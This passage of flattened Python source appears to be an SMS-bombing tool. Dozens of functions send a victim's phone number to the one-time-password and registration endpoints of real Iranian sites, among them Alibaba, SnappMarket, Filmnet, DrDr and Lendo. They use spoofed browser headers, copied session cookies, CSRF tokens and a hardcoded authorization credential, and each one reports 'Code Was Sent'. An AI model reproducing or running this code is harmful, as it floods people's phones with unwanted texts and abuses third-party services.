&quot;29&quot;,&quot;Origin&quot;: &quot;https://www.alibaba.ir&quot;,&quot;Connection&quot;: &quot;keep-alive&quot;,&quot;Referer&quot;: &quot;https://www.alibaba.ir/hotel&quot;}    alibabaD = {&quot;phoneNumber&quot;:&quot;0&quot;+phone.split(&quot;+98&quot;)[1]}    try:        alibabaR = post(timeout=5, url=&#x27;https://ws.alibaba.ir/api/v3/account/mobile/otp&#x27;, headers=alibabaH, json=alibabaD ).json()        if alibabaR[&quot;result&quot;][&quot;success&quot;] == True:            print(f&#x27;{g}(AliBaba) {w}Code Was Sent&#x27;)            return True    except:        passdef smarket(phone):    smarketU = f&#x27;https://api.snapp.market/mart/v1/user/loginMobileWithNoPass?cellphone=0{phone.split(&quot;+98&quot;)[1]}&#x27;    smarketH = {&#x27;accept&#x27;: &#x27;*/*&#x27;,&#x27;accept-encoding&#x27;: &#x27;gzip, deflate, br&#x27;,&#x27;accept-language&#x27;: &#x27;en-US,en;q=0.9&#x27;,&#x27;content-type&#x27;: &#x27;text/plain;charset=UTF-8&#x27;,&#x27;origin&#x27;: &#x27;https://snapp.market&#x27;,&#x27;referer&#x27;: &#x27;https://snapp.market/&#x27;,&#x27;user-agent&#x27;: &#x27;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 OPR/82.0.4227.33&#x27;}    try:        smarketR = post(timeout=5, url=smarketU, headers=smarketH).json()        if smarketR[&#x27;status&#x27;] == True:            print(f&#x27;{g}(SnapMarket) {w}Code Was Sent&#x27;)            return True    except:        pass def gapfilm(phone):    gaJ = {    &quot;Type&quot;: 3,    &quot;Username&quot;: phone.split(&quot;+98&quot;)[1],    &quot;SourceChannel&quot;: &quot;GF_WebSite&quot;,    &quot;SourcePlatform&quot;: &quot;desktop&quot;,    &quot;SourcePlatformAgentType&quot;: &quot;Opera&quot;,    &quot;SourcePlatformVersion&quot;: &quot;82.0.4227.33&quot;,    &quot;GiftCode&quot;: None}    gaU = &#x27;https://core.gapfilm.ir/api/v3.1/Account/Login&#x27;    gaH = {&#x27;Accept&#x27;: &#x27;application/json, text/plain, */*&#x27;,&#x27;Accept-Encoding&#x27;: &#x27;gzip, deflate, br&#x27;,&#x27;Accept-Language&#x27;: &#x27;fa&#x27;,&#x27;Browser&#x27;: &#x27;Opera&#x27;,&#x27;BrowserVersion&#x27;: &#x27;82.0.4227.33&#x27;,&#x27;Connection&#x27;: &#x27;keep-alive&#x27;,&#x27;Content-Type&#x27;: &#x27;application/json&#x27;,&#x27;Host&#x27;: &#x27;core.gapfilm.ir&#x27;,&#x27;IP&#x27;: &#x27;185.156.172.170&#x27;,&#x27;Origin&#x27;: &#x27;https://www.gapfilm.ir&#x27;,&#x27;OS&#x27;: &#x27;Linux&#x27;,&#x27;Referer&#x27;: &#x27;https://www.gapfilm.ir/&#x27;,&#x27;SourceChannel&#x27;: &#x27;GF_WebSite&#x27;,&#x27;User-Agent&#x27;: &#x27;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 OPR/82.0.4227.33&#x27;}    try:        gaR = post(timeout=5, url=gaU, headers=gaH, json=gaJ).json()        if gaR[&#x27;Code&#x27;] == 1:            print(f&#x27;{g}(GapFilm) {w}Code Was Sent&#x27;)            return True    except:        passdef sTrip(phone):    sTripH = {&quot;Host&quot;: &quot;www.snapptrip.com&quot;,&quot;User-Agent&quot;: &quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0&quot;,&quot;Accept&quot;: &quot;*/*&quot;,&quot;Accept-Language&quot;: &quot;fa&quot;,&quot;Accept-Encoding&quot;: &quot;gzip, deflate, br&quot;,&quot;Content-Type&quot;: &quot;application/json; charset=utf-8&quot;,&quot;lang&quot;: &quot;fa&quot;,&quot;X-Requested-With&quot;: &quot;XMLHttpRequest&quot;,&quot;Content-Length&quot;: &quot;134&quot;,&quot;Origin&quot;: &quot;https://www.snapptrip.com&quot;,&quot;Connection&quot;: &quot;keep-alive&quot;,&quot;Referer&quot;: &quot;https://www.snapptrip.com/&quot;,&quot;Cookie&quot;: &quot;route=1597937159.144.57.429702; unique-cookie=KViXnCmpkTwY7rY; appid=g*-**-*; ptpsession=g--196189383312301530; _ga=GA1.2.118271034.1597937174; _ga_G8HW6QM8FZ=GS1.1.1597937169.1.0.1597937169.60; _gid=GA1.2.561928072.1597937182; _gat_UA-107687430-1=1; analytics_campaign={%22source%22:%22google%22%2C%22medium%22:%22organic%22}; analytics_session_token=445b5d83-abeb-7ffd-091e-ea1ce5cfcb52; analytics_token=2809eef3-a3cf-7b9c-4191-8d8be8e5c6b7; yektanet_session_last_activity=8/20/2020; _hjid=b1148e0d-8d4b-4a3d-9934-0ac78569f4ea; _hjAbsoluteSessionInProgress=0; MEDIAAD_USER_ID=6648f107-1407-4c83-97a1-d39c9ec8ccad&quot;,&quot;TE&quot;: &quot;Trailers&quot;}    sTripD = {&quot;lang&quot;:&quot;fa&quot;,&quot;country_id&quot;:&quot;860&quot;,&quot;password&quot;:&quot;snaptrippass&quot;,&quot;mobile_phone&quot;:&quot;0&quot;+phone.split(&quot;+98&quot;)[1],&quot;country_code&quot;:&quot;+98&quot;,&quot;email&quot;:&quot;example@gmail.com&quot;}    try:        sTripR = post(timeout=5, url=&#x27;https://www.snapptrip.com/register&#x27;, headers=sTripH, json=sTripD).json()        if sTripR[&#x27;status_code&#x27;] == 200:            print(f&#x27;{g}(Strip) {w}Code Was Sent&#x27;)            return True    except:        passdef filmnet(phone):    fnU = f&quot;https://api-v2.filmnet.ir/access-token/users/{phone}/otp&quot;    fNh = {&#x27;Connection&#x27;: &#x27;keep-alive&#x27;,    &#x27;Accept&#x27;: &#x27;application/json, text/plain, */*&#x27;,    &#x27;DNT&#x27;: &#x27;1&#x27;,    &#x27;X-Platform&#x27;: &#x27;Web&#x27;,    &#x27;User-Agent&#x27;: &#x27;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36&#x27;,    &#x27;Origin&#x27;: &#x27;https://filmnet.ir&#x27;,    &#x27;Sec-Fetch-Site&#x27;: &#x27;same-site&#x27;,    &#x27;Sec-Fetch-Mode&#x27;: &#x27;cors&#x27;,    &#x27;Sec-Fetch-Dest&#x27;: &#x27;empty&#x27;,    &#x27;Referer&#x27;: &#x27;https://filmnet.ir/&#x27;,    &#x27;Accept-Language&#x27;: &#x27;fa,en-US;q=0.9,en;q=0.8&#x27;,    &#x27;Cache-Control&#x27;: &#x27;no-cache&#x27;,    &#x27;Accept-Encoding&#x27;: &#x27;gzip, deflate&#x27;}    try:        Filmnet = get(timeout=5, url=fnU, headers=fNh).json()        if Filmnet[&#x27;meta&#x27;][&#x27;operation_result&#x27;] == &#x27;success&#x27;:            print(f&#x27;{g}(Filmnet) {w}Code Was Sent&#x27;)            return True    except:        passdef drdr(phone):    dru = f&quot;https://drdr.ir/api/registerEnrollment/sendDisposableCode&quot;    drh = {&#x27;Connection&#x27;: &#x27;keep-alive&#x27;,    &#x27;Accept&#x27;: &#x27;application/json&#x27;,    &#x27;Authorization&#x27;: &#x27;hiToken&#x27;,    &#x27;User-Agent&#x27;: &#x27;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36&#x27;,    &#x27;Content-Type&#x27;: &#x27;application/json;charset=UTF-8&#x27;,    &#x27;Origin&#x27;: &#x27;https://drdr.ir&#x27;,    &#x27;Referer&#x27;: &#x27;https://drdr.ir/&#x27;,    &#x27;Accept-Language&#x27;: &#x27;en-US,en;q=0.9&#x27;,    &#x27;Accept-Encoding&#x27;: &#x27;gzip, deflate&#x27;}    try:        drdr = post(timeout=5, url=dru, headers=drh, params={&quot;phoneNumber&quot;:phone ,&quot;userType&quot;:&quot;PATIENT&quot;}).json()        if drdr[&#x27;status&#x27;] == &#x27;success&#x27;:            print(f&#x27;{g}(DrDr) {w}Code Was Sent&#x27;)            return True    except:        passdef itool(phone):    itJ = {&#x27;mobile&#x27;: phone}    itU = &#x27;https://app.itoll.ir/api/v1/auth/login&#x27;    itH = {        &#x27;accept&#x27;: &#x27;application/json, text/plain, */*&#x27;,        &#x27;accept-encoding&#x27;: &#x27;gzip, deflate, br&#x27;,        &#x27;accept-language&#x27;: &#x27;fa&#x27;,        &#x27;content-type&#x27;: &#x27;application/json;charset=UTF-8&#x27;,        &#x27;origin&#x27;: &#x27;https://itoll.ir&#x27;,        &#x27;referer&#x27;: &#x27;https://itoll.ir/&#x27;,        &#x27;user-agent&#x27;: &#x27;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2 Safari/537.36&#x27;}    try:        ok = post(timeout=5, url=itU, headers=itH, json=itJ).json()        if ok[&#x27;success&#x27;] == True:            print(f&#x27;{g}(Itool) {w}Code Was Sent&#x27;)            return True    except:        passdef anar(phone):    anrJ = {&#x27;user&#x27;: phone, &#x27;app_id&#x27;: 99}    anrU = &#x27;https://api.anargift.com/api/people/auth&#x27;    anrH = {&#x27;accept&#x27;: &#x27;application/json, text/plain, */*&#x27;,&#x27;accept-encoding&#x27;: &#x27;gzip, deflate, br&#x27;,&#x27;accept-language&#x27;: &#x27;en-US,en;q=0.9&#x27;,&#x27;content-length&#x27;: &#x27;34&#x27;,&#x27;content-type&#x27;: &#x27;application/json;charset=UTF-8&#x27;,&#x27;origin&#x27;: &#x27;https://anargift.com&#x27;,&#x27;referer&#x27;: &#x27;https://anargift.com/&#x27;,&#x27;user-agent&#x27;: &#x27;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36&#x27;    }    try:        ok = post(timeout=5, url=anrU, headers=anrH, json=anrJ).json()              if ok[&#x27;status&#x27;] == True:            print(f&#x27;{g}(AnarGift) {w}Code Was Sent&#x27;)            return True    except :        passdef azki(phone):    azkU = f&#x27;https://www.azki.com/api/core/app/user/checkLoginAvailability/%7B&quot;phoneNumber&quot;:&quot;azki_{phone}&quot;%7D&#x27;    azkH = {&#x27;accept&#x27;: &#x27;application/json, text/plain, */*&#x27;,&#x27;accept-encoding&#x27;: &#x27;gzip, deflate, br&#x27;,&#x27;accept-language&#x27;: &#x27;en-US,en;q=0.9&#x27;,&#x27;authorization&#x27;: &#x27;Basic QmltaXRvQ2xpZW50OkJpbWl0b1NlY3JldA==&#x27;,&#x27;device&#x27;: &#x27;web&#x27;,&#x27;deviceid&#x27;: &#x27;6&#x27;,&#x27;password&#x27;: &#x27;BimitoSecret&#x27;,&#x27;origin&#x27;: &#x27;https://www.azki.com&#x27;,&#x27;referer&#x27;: &#x27;https://www.azki.com/&#x27;,&#x27;user-agent&#x27;: &#x27;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36&#x27;,&#x27;user-token&#x27;: &#x27;LW6H4KSMStwwKXWeFey05gtdw2iW8QRtSk70phP6tBJindQ4irdzTmSqDI9TkVqE&#x27;,&#x27;username&#x27;: &#x27;BimitoClient&#x27;    }    try:        ok = post(timeout=5, url=azkU, headers=azkH).json()        if ok[&quot;messageCode&quot;] == 201:            print(f&#x27;{g}(Azki) {w}Code Was Sent&#x27;)            return True    except:        passdef nobat(phone):    noJ = {&#x27;mobile&#x27;: phone}    noU = &#x27;https://nobat.ir/api/public/patient/login/phone&#x27;    noH = {&#x27;accept&#x27;: &#x27;*/*&#x27;,&#x27;accept-encoding&#x27;: &#x27;gzip, deflate, br&#x27;,&#x27;accept-language&#x27;: &#x27;en-US,en;q=0.9&#x27;,&#x27;access-control-request-headers&#x27;: &#x27;nobat-cookie&#x27;,&#x27;access-control-request-method&#x27;: &#x27;POST&#x27;,&#x27;origin&#x27;: &#x27;https://user.nobat.ir&#x27;,&#x27;referer&#x27;: &#x27;https://user.nobat.ir/&#x27;,&#x27;user-agent&#x27;: &#x27;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36&#x27;    }    try:        ok = post(timeout=5, url=noU, headers=noH, json=noJ).json()        if ok[&quot;status&quot;] != &#x27;failed&#x27;:            return True    except:        passdef chmdon(phone):    chJ = {    &quot;mobile&quot;: &#x27;0&#x27;+phone.split(&#x27;+98&#x27;)[1],    &quot;origin&quot;: &quot;/&quot;,    &quot;referrer_id&quot;: None    }    chU = &#x27;https://chamedoon.com/api/v1/membership/guest/request_mobile_verification&#x27;    chH = {&#x27;accept&#x27;: &#x27;application/json, text/plain, */*&#x27;,&#x27;accept-encoding&#x27;: &#x27;gzip, deflate, br&#x27;,&#x27;accept-language&#x27;: &#x27;en-US,en;q=0.9&#x27;,&#x27;content-type&#x27;: &#x27;application/json;charset=UTF-8&#x27;,&#x27;cookie&#x27;: &#x27;activity=%7B%22referrer_id%22%3Anull%2C%22origin%22%3A%22%2F%22%7D&#x27;,&#x27;origin&#x27;: &#x27;https://chamedoon.com&#x27;,&#x27;referer&#x27;: &#x27;https://chamedoon.com/&#x27;,&#x27;user-agent&#x27;: &#x27;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36&#x27;    }    try:        ok = post(timeout=5, url=chU, headers=chH, json=chJ).json()        if ok[&quot;status&quot;] == &#x27;ok&#x27;:            print(f&#x27;{g}(Chamedoon) {w}Code Was Sent&#x27;)            return True    except:        pass def bn(phone):    bnJ = {    &quot;phone&quot;: &#x27;0&#x27;+phone.split(&#x27;+98&#x27;)[1]}    bnU = &#x27;https://mobapi.banimode.com/api/v2/auth/request&#x27;    bnH = {&#x27;Accept&#x27;: &#x27;*/*&#x27;,&#x27;Accept-Encoding&#x27;: &#x27;gzip, deflate, br&#x27;,&#x27;Accept-Language&#x27;: &#x27;en-US,en;q=0.9&#x27;,&#x27;Access-Control-Request-Headers&#x27;: &#x27;content-type,platform&#x27;,&#x27;Access-Control-Request-Method&#x27;: &#x27;POST&#x27;,&#x27;Connection&#x27;: &#x27;keep-alive&#x27;,&#x27;Host&#x27;: &#x27;mobapi.banimode.com&#x27;,&#x27;Origin&#x27;: &#x27;https://www.banimode.com&#x27;,&#x27;Referer&#x27;: &#x27;https://www.banimode.com/&#x27;,&#x27;user-agent&#x27;: &#x27;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36&#x27;    }    try:        ok = post(timeout=5, url=bnU, headers=bnH, json=bnJ).json()        if ok[&quot;status&quot;] == &#x27;success&#x27;:            print(f&#x27;{g}(BaniMode) {w}Code Was Sent&#x27;)            return True    except:        pass def lendo(phone):    leD = {&#x27;_token&#x27;: &#x27;mXBVe062llzpXAxD5EzN4b5yqrSuWJMVPl1dFTV6&#x27;,&#x27;mobile&#x27;: &#x27;0&#x27;+phone.split(&#x27;+98&#x27;)[1],&#x27;password&#x27;: &#x27;ibvvb@3#9nc&#x27;}    leU = &#x27;https://lendo.ir/register?&#x27;    leH = {&#x27;Accept&#x27;: &#x27;text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9&#x27;,&#x27;Accept-Encoding&#x27;: &#x27;gzip, deflate, br&#x27;,&#x27;Accept-Language&#x27;: &#x27;en-US,en;q=0.9&#x27;,&#x27;Cache-Control&#x27;: &#x27;max-age=0&#x27;,&#x27;Connection&#x27;: &#x27;keep-alive&#x27;,&#x27;Content-Type&#x27;: &#x27;application/x-www-form-urlencoded&#x27;,&#x27;Cookie&#x27;: &#x27;lendo_session=eyJpdiI6Imh2QXVnS3Q1ejFvQllhSVgzRTZORVE9PSIsInZhbHVlIjoicFE0VzJWc016a3BHXC9CRTE3S21OSXV0XC84U015VTJwdDBRVWZNUDRIUmxmS1gwSDR5NVEwQlhmaUlMdTM2XC9EQyIsIm1hYyI6ImMzMWRhYWE1ODA3MTE1ZGI5ZGIxNTAxNTg5NzBhNWYzNjZjNzk2MDNhYWNlNTU1OTc5ZTYzNjNmYWU5OGZiMWIifQ%3D%3D&#x27;,&#x27;Host&#x27;: &#x27;lendo.ir&#x27;,&#x27;Origin&#x27;: &#x27;https://lendo.ir&#x27;,&#x27;Referer&#x27;: &#x27;https://lendo.ir/register&#x27;,&#x27;Upgrade-Insecure-Requests&#x27;: &#x27;1&#x27;,&#x27;user-agent&#x27;: &#x27;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36&#x27;}    try:        lendoR = post(timeout=5, url=leU, headers=leH, data=leD).text        if &#x27;تایید شماره تلفن همراه&#x27; in lendoR:            print(f&#x27;{g}(Lendo) {w}Code Was Sent&#x27;)            return True    except:        passdef olgoo(phone):    olD = {&#x27;contactInfo[mobile]&#x27;: &#x27;0&#x27;+phone.split(&#x27;+98&#x27;)[1],&#x27;contactInfo[agreementAccepted]&#x27;: &#x27;1&#x27;,&#x27;contactInfo[teachingFieldId]&#x27;: &#x27;1&#x27;,&#x27;contactInfo[eduGradeIds][7]&#x27;: &#x27;7&#x27;,&#x27;submit_register&#x27;: &#x27;1&#x27;}    olU = &#x27;https://www.olgoobooks.ir/sn/userRegistration/?&amp;requestedByAjax=1&amp;elementsId=userRegisterationBox&#x27;    olH = {&#x27;Accept&#x27;: &#x27;text/plain, */*; q=0.01&#x27;,&#x27;Accept-Encoding&#x27;: &#x27;gzip, deflate, br&#x27;,&#x27;Accept-Language&#x27;: &#x27;en-US,en;q=0.9&#x27;,&#x27;Connection&#x27;: &#x27;keep-alive&#x27;,&#x27;Content-Length&#x27;: &#x27;163&#x27;,&#x27;Content-Type&#x27;: &#x27;application/x-www-form-urlencoded&#x27;,&#x27;Cookie&#x27;: &#x27;PHPSESSID=l1gv6gp0osvdqt4822vaianlm5&#x27;,&#x27;Host&#x27;: &#x27;www.olgoobooks.ir&#x27;,&#x27;Origin&#x27;: &#x27;https://www.olgoobooks.ir&#x27;,&#x27;Referer&#x27;: &#x27;https://www.olgoobooks.ir/sn/userRegistration/&#x27;,&#x27;X-Requested-With&#x27;: &#x27;XMLHttpRequest&#x27;,&#x27;user-agent&#x27;: &#x27;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36&#x27;}    try:        olgoo = post(timeout=5, url=olU, headers=olH, data=olD).text        if &#x27;مدت زمان باقی‌مانده تا دریافت مجدد کد&#x27; in olgoo:            print(f&#x27;{g}(NashrOlgoo) {w}Code Was Sent&#x27;)            return True    except:        pass def pakhsh(phone):    paD = f&#x27;action=digits_check_mob&amp;countrycode=%2B98&amp;mobileNo=0{phone.split(&quot;+98&quot;)[1]}&amp;csrf=fdaa7fc8e6&amp;login=2&amp;username=&amp;email=&amp;captcha=&amp;captcha_ses=&amp;json=1&amp;whatsapp=0&#x27;    paU = &#x27;https://www.pakhsh.shop/wp-admin/admin-ajax.php&#x27;    paH = {&#x27;accept&#x27;: &#x27;*/*&#x27;,&#x27;accept-encoding&#x27;: &#x27;gzip, deflate, br&#x27;,&#x27;accept-language&#x27;: &#x27;en-US,en;q=0.9&#x27;,&#x27;content-length&#x27;: &#x27;143&#x27;,&#x27;content-type&#x27;: &#x27;application/x-www-form-urlencoded; charset=UTF-8&#x27;,&#x27;cookie&#x27;: &#x27;digits_countrycode=98; _wpfuuid=b21e7550-db54-469f-846d-6993cfc4815d&#x27;,&#x27;origin&#x27;: &#x27;https://www.pakhsh.shop&#x27;,&#x27;referer&#x27;: &#x27;https://www.pakhsh.shop/%D9%85%D8%B1%D8%A7%D8%AD%D9%84-%D8%AB%D8%A8%D8%AA-%D8%B3%D9%81%D8%A7%D8%B1%D8%B4-%D9%88-%D8%AE%D8%B1%DB%8C%D8%AF/&#x27;,&#x27;user-agent&#x27;: &#x27;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36&#x27;,&#x27;x-requested-with&#x27;: &#x27;XMLHttpRequest&#x27;}    try:        ok = post(timeout=5, url=paU, headers=paH, data=paD).json()        if ok[&#x27;code&#x27;] == &#x27;1&#x27;:            print(f&#x27;{g}(PakhshShop) {w}Code Was Sent&#x27;)            return True    except:        passdef didnegar(phone):    paD = f&#x27;action=digits_check_mob&amp;countrycode=%2B98&amp;mobileNo={phone.split(&quot;+98&quot;)[1]}&amp;csrf=4c9ac22ff4&amp;login=1&amp;username=&amp;email=&amp;captcha=&amp;captcha_ses=&amp;digits=1&amp;json=1&amp;whatsapp=0&amp;mobmail=0{phone.split(&quot;+98&quot;)[1]}&amp;dig_otp=&amp;digits_login_remember_me=1&amp;dig_nounce=4c9ac22ff4&#x27;    paU = &#x27;https://www.didnegar.com/wp-admin/admin-ajax.php&#x27;    paH = {&#x27;accept&#x27;: &#x27;*/*&#x27;,&#x27;accept-encoding&#x27;: &#x27;gzip, deflate, br&#x27;,&#x27;accept-language&#x27;: &#x27;en-US,en;q=0.9&#x27;,&#x27;content-length&#x27;: &#x27;143&#x27;,&#x27;content-type&#x27;: &#x27;application/x-www-form-urlencoded; charset=UTF-8&#x27;,&#x27;cookie&#x27;: &#x27;PHPSESSID=881f0d244b83c1db49d4c39e5fe7b108; digits_countrycode=98; _5f9d3331dba5a62b1268c532=true&#x27;,&#x27;origin&#x27;: &#x27;https://www.didnegar.com&#x27;,&#x27;referer&#x27;: &#x27;https://www.didnegar.com/my-account/?login=true&amp;back=home&amp;page=1&#x27;,&#x27;user-agent&#x27;: &#x27;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36&#x27;,&#x27;x-requested-with&#x27;: &#x27;XMLHttpRequest&#x27;}    try:        ok = post(timeout=5, url=paU, headers=paH, data=paD).json()        if ok[&#x27;code&#x27;] == &#x27;1&#x27;:            print(f&#x27;{g}(DideNegar) {w}Code Was Sent&#x27;)            return True    except:        passdef baskol(phone):    baJ = {    &quot;phone&quot;: &#x27;0&#x27;+phone.split(&#x27;+98&#x27;)[1]}    baU = &#x27;https://www.buskool.com/send_verification_code&#x27;    baH = {&#x27;accept&#x27;: &#x27;application/json, text/plain, */*&#x27;,&#x27;accept-encoding&#x27;: &#x27;gzip, deflate, br&#x27;,&#x27;accept-language&#x27;: &#x27;en-US,en;q=0.9&#x27;,&#x27;content-type&#x27;: &#x27;application/json;charset=UTF-8&#x27;,&#x27;cookie&#x27;: &#x27;laravel_session=2Gp6A82VC8CPMgaB7sI0glrGP52XyjXNKnNAeZq3&#x27;,&#x27;origin&#x27;: &#x27;https://www.buskool.com&#x27;,&#x27;referer&#x27;: &#x27;https://www.buskool.com/register&#x27;,&#x27;user-agent&#x27;: &#x27;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36&#x27;,&#x27;x-csrf-token&#x27;: &#x27;trUVHIRWtjE58Fn9Pud1ciz2XaTbTgFHgCLsPykD&#x27;,&#x27;x-requested-with&#x27;: &#x27;XMLHttpRequest&#x27;}    try:        ok = post(timeout=5, url=baU, headers=baH, json=baJ).json()        if ok[&#x27;status&#x27;] == True:            print(f&#x27;{g}(Baskol) {w}Code Was Sent&#x27;)            return True    except:        passdef kilid(phone):    kiJ = {    &quot;mobile&quot;: &#x27;0&#x27;+phone.split(&#x27;+98&#x27;)[1]}    kiU = &#x27;https://server.kilid.com/global_auth_api/v1.0/authenticate/login/realm/otp/start?realm=PORTAL&#x27;    kiH = {&#x27;Accept&#x27;: &#x27;application/json, text/plain, */*&#x27;,&#x27;Accept-Encoding&#x27;: &#x27;gzip, deflate, br&#x27;,&#x27;Accept-Language&#x27;: &#x27;en-US,en;q=0.9&#x27;,&#x27;Connection&#x27;: &#x27;keep-alive&#x27;,&#x27;Content-Type&#x27;: &#x27;application/json&#x27;,&#x27;COUNTRY_ID&#x27;: &#x27;2&#x27;,&#x27;Host&#x27;: &#x27;server.kilid.com&#x27;,&#x27;LOCALE&#x27;: &#x27;FA&#x27;,&#x27;Origin&#x27;: &#x27;https://kilid.com&#x27;,&#x27;Referer&#x27;: &#x27;https://kilid.com/&#x27;,&#x27;User-Agent&#x27;: &#x27;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 OPR/82.0.4227.23&#x27;}    try:        ok = post(timeout=5, url=kiU, headers=kiH, json=kiJ).json()        if ok[&#x27;status&#x27;] == &#x27;SUCCESS&#x27;:            print(f&#x27;{g}(Kilid) {w}Code Was Sent&#x27;)            return True    except:        passdef basalam(phone):    baJ = {    &quot;variables&quot;: {        &quot;mobile&quot;: &#x27;0&#x27;+phone.split(&#x27;+98&#x27;)[1]    },    &quot;query&quot;: &quot;mutation verificationCodeRequest($mobile: MobileScalar!) { mobileVerificationCodeRequest(mobile: $mobile) { success } }&quot;}    baU = &#x27;https://api.basalam.com/user&#x27;    baH = {&#x27;accept&#x27;: &#x27;application/json, text/plain, */*&#x27;,&#x27;accept-encoding&#x27;: &#x27;gzip, deflate, br&#x27;,&#x27;accept-language&#x27;: &#x27;en-US,en;q=0.9&#x27;,&#x27;authorization&#x27;: &#x27;Bearer undefined&#x27;,&#x27;content-length&#x27;: &#x27;168&#x27;,&#x27;content-type&#x27;: &#x27;application/json;charset=UTF-8&#x27;,&#x27;origin&#x27;: &#x27;https://basalam.com&#x27;,&#x27;referer&#x27;: &#x27;https://basalam.com/&#x27;,&#x27;user-agent&#x27;: &#x27;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 OPR/82.0.4227.23&#x27;,&#x27;x-client-info&#x27;: &#x27;{&quot;name&quot;:&quot;web.public&quot;}&#x27;,&#x27;x-creation-tags&#x27;: &#x27;{&quot;app&quot;:&quot;web&quot;,&quot;client&quot;:&quot;customer&quot;,&quot;os&quot;:&quot;linux&quot;,&quot;device&quot;:&quot;desktop&quot;,&quot;uri&quot;:&quot;/accounts&quot;,&quot;fullPath&quot;:&quot;/accounts&quot;,&quot;utms&quot;:&quot;organic&quot;,&quot;landing_url&quot;:&quot;basalam.com%2Faccounts&quot;,&quot;tag&quot;:[null]}&#x27;}    try:        ok = post(timeout=5, url=baU, headers=baH, json=baJ)        if ok.status_code == 200:            print(f&#x27;{g}(BaSalam) {w}Code Was Sent&#x27;)            return True    except:        passdef see5(phone):    seD = {&#x27;mobile&#x27;: &#x27;0&#x27;+phone.split(&#x27;+98&#x27;)[1],&#x27;action&#x27;: &#x27;sendsms&#x27;}    seU = &#x27;https://crm.see5.net/api_ajax/sendotp.php&#x27;    seH = {&#x27;accept&#x27;: &#x27;*/*&#x27;,&#x27;accept-encoding&#x27;: &#x27;gzip, deflate, br&#x27;,&#x27;accept-language&#x27;: &#x27;en-US,en;q=0.9&#x27;,&#x27;content-length&#x27;: &#x27;33&#x27;,&#x27;content-type&#x27;: &#x27;application/x-www-form-urlencoded; charset=UTF-8&#x27;,&#x27;cookie&#x27;: &#x27;_ga=GA1.2.1824452401.1639326535; _gid=GA1.2.438992536.1639326535; analytics_campaign={%22source%22:%22google%22%2C%22medium%22:%22cpc%22%2C%22campaign%22:%22adwords%22%2C%22content%22:%22adwords%22}; crisp-client%2Fsession%2Fc55c0d24-98fe-419a-862f-0b31e955fd59=session_812ec81d-13c1-4a69-a494-ad54e1f290ef; __utma=55084201.1824452401.1639326535.1639326540.1639326540.1; __utmc=55084201; __utmz=55084201.1639326540.1.1.utmcsr=Ads|utmgclid=EAIaIQobChMIsfOridfe9AIV5o5oCR2zJQjCEAMYAiAAEgLT8fD_BwE|utmccn=Exact-shopsaz|utmcmd=cpc|utmctr=(not%20provided); _gac_UA-62787234-1=1.1639326540.EAIaIQobChMIsfOridfe9AIV5o5oCR2zJQjCEAMYAiAAEgLT8fD_BwE; __utmt=1; __utmb=55084201.3.10.1639326540; WHMCSkYBsAa1NDZ2k=6ba6de855ce426e25ea6bf402d1dc09c&#x27;,&#x27;origin&#x27;: &#x27;https://crm.see5.net&#x27;,&#x27;referer&#x27;: &#x27;https://crm.see5.net/clientarea.php&#x27;,&#x27;user-agent&#x27;: &#x27;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 OPR/82.0.4227.23&#x27;,&#x27;x-requested-with&#x27;: &#x27;XMLHttpRequest&#x27;}    ok = post(timeout=5, url=seU, headers=seH, data=seD).text    try:        if ok == &#x27;send_sms&#x27;:            print(f&#x27;{g}(See5) {w}Code Was Sent&#x27;)            return True    except:        passdef ghabzino(phone):    ghJ = {    &quot;Parameters&quot;: {        &quot;ApplicationType&quot;: &quot;Web&quot;,        &quot;ApplicationUniqueToken&quot;: None,        &quot;ApplicationVersion&quot;: &quot;1.0.0&quot;,        &quot;MobileNumber&quot;: &#x27;0&#x27;+phone.split(&#x27;+98&#x27;)[1]    }}    ghU = &#x27;https://application2.billingsystem.ayantech.ir/WebServices/Core.svc/requestActivationCode&#x27;    ghH = {&#x27;accept&#x27;: &#x27;application/json, text/plain, */*&#x27;,&#x27;accept-encoding&#x27;: &#x27;gzip, deflate, br&#x27;,&#x27;accept-language&#x27;: 